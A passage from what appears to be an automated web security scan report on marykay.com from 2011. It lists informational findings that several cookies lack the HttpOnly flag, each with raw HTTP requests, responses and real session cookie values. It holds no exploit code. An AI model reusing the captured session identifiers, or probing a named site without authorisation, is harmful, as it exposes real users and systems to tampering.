The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Scripts/jquery-1.4.2.min.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 38069
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=C45F6C2F49D028674DB98F82BB89FB3E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

/*!
* jQuery JavaScript Library v1.3
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2
...[SNIP]...

13.240. http://www.marykay.com/Styles.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Styles.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Styles.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 14259
Content-Type: text/css
Last-Modified: Wed, 10 Aug 2011 07:14:08 GMT
Accept-Ranges: bytes
ETag: "0e050182d57cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/*******************************************************************************************************************\
* Global Styles
...[SNIP]...

13.241. http://www.marykay.com/Styles_US.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Styles_US.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Styles_US.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 23822
Content-Type: text/css
Last-Modified: Thu, 02 Jun 2011 09:18:10 GMT
Accept-Ranges: bytes
ETag: "03597fd521cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=4162573847264D86536F4E90C80EA38A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/*******************************************************************************************************************\
* Global Styles
...[SNIP]...

13.242. http://www.marykay.com/Themes/TabMenu/US/tabs.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Themes/TabMenu/US/tabs.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Themes/TabMenu/US/tabs.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/css
Last-Modified: Wed, 06 Apr 2011 17:12:30 GMT
Accept-Ranges: bytes
ETag: "7970d2cf7df4cb1:d8226"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=6F98459542F76D915AA05BB75B891338; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/


13.243. http://www.marykay.com/Themes/TabMenu/tabs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Themes/TabMenu/tabs.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Themes/TabMenu/tabs.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 14231
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:28 GMT
Accept-Ranges: bytes
ETag: "0a655ce7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A5B951464DDB4DF25E342EB344BDA973; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

var delay = 1000;
var seltab = null;
var prevtab = null;
function tabs_init(id)
{
   seltab = document.getElementById(id);
   showTab(seltab, false);
}
function hideMenu(menu)
{
   if (menu != nul
...[SNIP]...

13.244. http://www.marykay.com/content/HPflash/portfolio_mk.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /content/HPflash/portfolio_mk.xml

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /content/HPflash/portfolio_mk.xml HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 316
Content-Type: text/xml
Last-Modified: Wed, 31 Aug 2011 14:47:25 GMT
Accept-Ranges: bytes
ETag: "8bceaae5ec67cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=19C9D0014D75852EFB8C9087C106B6A5; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:52 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:53 GMT; path=/

<?xml version="1.0" ?>
<portfolio>
   <picture thumb    = "/CONTENT/HPflash/Thumbs/tb_eyebundles.jpg"/>
   <picture thumb    = "/CONTENT/HPflash/Thumbs/tb_mascarawardrobe.jpg"/>            
   <picture thumb    = "/CONTE
...[SNIP]...

13.245. http://www.marykay.com/content/hpflash/stage.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /content/hpflash/stage.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /content/hpflash/stage.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41607
Content-Type: application/x-shockwave-flash
Last-Modified: Fri, 03 Jun 2011 15:46:18 GMT
Accept-Ranges: bytes
ETag: "a318661522cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=9326E0864457B586C81FDD8CE24A23E5; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:50 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

CWS..i..x...wTS..(<IH..1T..@..t.I..$...(J7A......%...    .!tAQ..("(.X "*6., v.
......w....?..u....={f~.M......P..@.....q@OLL..-F.>.......:.....`=3j.[X.....8`.)..`o4j.X.....e.^....".ak.....`....QA...o...
...[SNIP]...

13.246. http://www.marykay.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: Subsidiary, PreviousMoniker, Moniker, ConsultantContactID, TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.aspx?pid=mk HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Subsidiary=US; TLTHID=DFDB2FDD45BA94FC283A74BD7C3CBF64; TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 06 Sep 2011 16:45:46 GMT
Content-Type: text/html; charset=utf-8
Content-Language: en
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: Subsidiary=US; path=/
Set-Cookie: PreviousMoniker=; path=/
Set-Cookie: Moniker=; path=/
Set-Cookie: ConsultantContactID=-9223372036854775808; path=/
Set-Cookie: TLTHID=A79DE10345855E54FDA05590CB54614B; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Vary: Accept-Encoding
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/
Content-Length: 36830


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN" >
<html>
<head><meta name="title" content="Mary Kay... Find your way to beautiful!" /><link id="Link1" rel="image_src" href="http://w
...[SNIP]...

13.247. http://www.marykay.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Wed, 06 Apr 2011 17:12:18 GMT
Accept-Ranges: bytes
ETag: "b9ed3c87df4cb1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=43433491401355FE92B1C286F65FC316; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:57 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

..............(.......(....... ....................................3...f...f...........................$...........\......m...wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwEwWtgEwFDu.rw4sWds%bwDDwtBtDwAGwt.
...[SNIP]...

13.248. http://www.marykay.com/images/fflogo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/fflogo.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/fflogo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1665
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "8b6f46621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BCE7DC82466E2D42565B29A3B3C4E9C6; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

............................................................................................................J..
...[SNIP]...

13.249. http://www.marykay.com/images/icn_ec.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_ec.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icn_ec.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1712
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "17d0446621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=242A48734AE8C90326B538806CDF19D0; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................$.Z..
...[SNIP]...

13.250. http://www.marykay.com/images/icn_fb.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_fb.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icn_fb.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1769
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "bbc506621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=8AA5E3834817F20E05D692A6C10BEF9D; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR...z...$........4....gAMA......a.....tEXtSoftware.Adobe ImageReadyq.e<...{IDAThC.Z.oTE...mL0!.?@q%.*...    H"./h.W..D..l..}hY.(R............D....1-,&m.~....g......Z......3gf.............
...[SNIP]...

13.251. http://www.marykay.com/images/icn_pbp.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_pbp.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icn_pbp.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 2351
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "d380556621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=171587244A3CE521A7BA37AE883107B1; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....`.`.....4Exif..II*.......1...............Adobe ImageReady.....C...........        .
................... $.' ",#..(7),01444.'9=82<.342...C.            .....2!.!22222222222222222222222222222222222222
...[SNIP]...

13.252. http://www.marykay.com/images/icn_vmo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_vmo.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icn_vmo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1933
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "8f31666621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=1DB2B50F43E3F4D03BDF68AE8CA2AE7C; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

...[SNIP]...

13.253. http://www.marykay.com/images/icn_yt.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/icn_yt.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/icn_yt.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 3367
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "7797e6621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=34430B6646F0AFCCDB0A7A9022E2E592; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

...[SNIP]...

13.254. http://www.marykay.com/images/ielogo.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /images/ielogo.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /images/ielogo.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1740
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:18:25 GMT
Accept-Ranges: bytes
ETag: "cf578c6621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=228F4B284CAFE25E42ECD3B80A8FB732; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
